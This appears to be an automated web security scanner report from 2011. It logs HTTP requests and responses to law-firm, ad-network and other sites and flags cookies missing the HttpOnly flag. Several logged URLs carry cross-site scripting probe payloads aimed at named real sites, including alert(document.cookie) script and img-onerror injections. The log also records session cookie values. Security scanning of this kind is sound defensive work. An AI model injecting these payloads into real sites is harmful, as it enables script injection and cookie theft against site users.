HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.kasimer-ittig.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title>Covington Political Broadcasting Law</title ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263656;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/ Set-Cookie: CFTOKEN=43582841;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cf?con=41cafe7%2B34f5e64%2Bb3b11e8&rand=1295459680369&sid=&xurl= HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://ads.roiserver.com/disp?pid=2DFE311&rand=22153025 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT SAdBuild: 400 P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml" Set-Cookie: sadsp-2DFE311="41cafe7/129545968,34f5e64/129545968,b3b11e8/129545968"; Version=1; Domain=ads.roiserver.com; Max-Age=87840; Expires=Thu, 20-Jan-2011 18:18:42 GMT; Path=/ Content-Type: image/gif Content-Length: 807 Date: Wed, 19 Jan 2011 17:54:42 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?clid=41cafe7&rand=1295459680368&sid= HTTP/1.1 Host: ads.roiserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sadsp-2DFE311="41cafe7/129545968,34f5e64/129545968,b3b11e8/129545968";
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT SAdBuild: 400 P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml" Set-Cookie: sadscpax=41cafe7-; Domain=ads.roiserver.com; Expires=Thu, 20-Jan-2011 18:29:21 GMT; Path=/ Location: http://clkrd.com/ad.php?o=acai Content-Length: 0 Date: Wed, 19 Jan 2011 18:05:21 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6035991&rn=57307763&c7=http%3A%2F%2Fwww.yellowpages.com%2FWashington-DC74302%253Cimg%2520src%253da%2520onerror%253dalert(1)%253E9c7a66be0e0%2FAttorneys&c8=No%20Location%20Found%20-%20YP.com&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Wed, 19 Jan 2011 15:26:51 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 18-Jan-2013 15:26:51 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The following cookie was issued by the application and does not have the HttpOnly flag set:
FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /OzoDB/cutils/R52_5/jsc/933/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2608430956 Cache-Control: max-age=2007212 Expires: Fri, 11 Feb 2011 23:40:50 GMT Date: Wed, 19 Jan 2011 18:07:18 GMT Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fm.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 911 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0daa-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=285 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:14 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=301 Expires: Wed, 19 Jan 2011 15:55:44 GMT Date: Wed, 19 Jan 2011 15:50:43 GMT Connection: close Content-Length: 2277
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fmr.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 912 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=284 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:15 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookie was issued by the application and does not have the HttpOnly flag set:
FFgeo=5386156;expires=Thu, 19 Jan 2012 15:50:46 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
ZFFAbh=749B826,20|1483_749#365;expires=Thu, 19 Jan 2012 15:50:47 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 179 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 15:51:10 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 15:51:10 GMT; Path=/ Set-Cookie: di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 12:57:24 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 15:51:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 15:51:10 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /404.aspx HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=21182496.1295451935.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/21; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; DefaultCulture=en-US; NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660; __utma=21182496.1025166527.1295451935.1295451935.1295451935.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=21182496; __utmb=21182496.2.10.1295451935; ASP.NET_SessionId=frpmkd55p5dmxt55rnepogqw; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; SiteId=0;
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gateway/gw.js?csid=K08784&auto=t HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; udm_0=...[SNIP]...; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=...[SNIP]...; rsi_segs_1000000=pUPFfUnF7gMUVVNGyQq6Tc2UE03EygBbRXVdvuFY1BA6MUfyIuV86Lli0TAjp7vTbarnvaHN9T2ow1lTs80IFRatyDifWyk9mf1Kh7aRP1Ys1ciYX3r+3g5rrIF04H4FAiutUjgMss6NEqGMIeSYHxakEN/DRePx1bwHrbhXzJD91WqT8N1pQYXg+GpVj1vtVjK1+AiwL4ScNYq0oKT0cw==; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBa40HAV7DEFZEdMKVl168Ne30F2LgIMllRLOj2CnyxLwSlYtMGPNUFv6UJ75S23vXs9VpSODtSfbRXbKeKsIfm/9vVCVRHq5E9dPOyJm5LyxhQ0JLpdlLRkRi1AuT5G8QYh4GpDTxObx7HqsmwclpQmx8PITjRXvTVnlGDfiP+KG3TuYhIgfdoMdRUNcxsYfj/XLnOWpzH6FblA==
//Vermont-12.4.0-1012 var rsi_now= new Date(); var rsi_csid= 'K08784';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /event-log-analysis-sm/ HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /config/login HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:20 GMT Set-Cookie: B=5u97cop6jea6g&b=3&s=jo; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 41558
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Sign in ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /g.lt?nvst=12596&nvtt=z&nvup=1 HTTP/1.1 Host: lt.navegg.com Proxy-Connection: keep-alive Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR' Set-Cookie: ltcid=547362597; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2013 11:57:37 GMT Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2011 15:57:37 GMT Content-type: application/javascript Date: Wed, 19 Jan 2011 17:57:37 GMT Server: lighttpd/1.4.19 Content-Length: 43
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fca/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sec/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sec/scripts/resize.gif HTTP/1.1 Host: skaddenpractices.skadden.com Proxy-Connection: keep-alive Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630
The following cookie was issued by the application and does not have the HttpOnly flag set:
Coyote-2-a0f0083=a0f022f:0; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
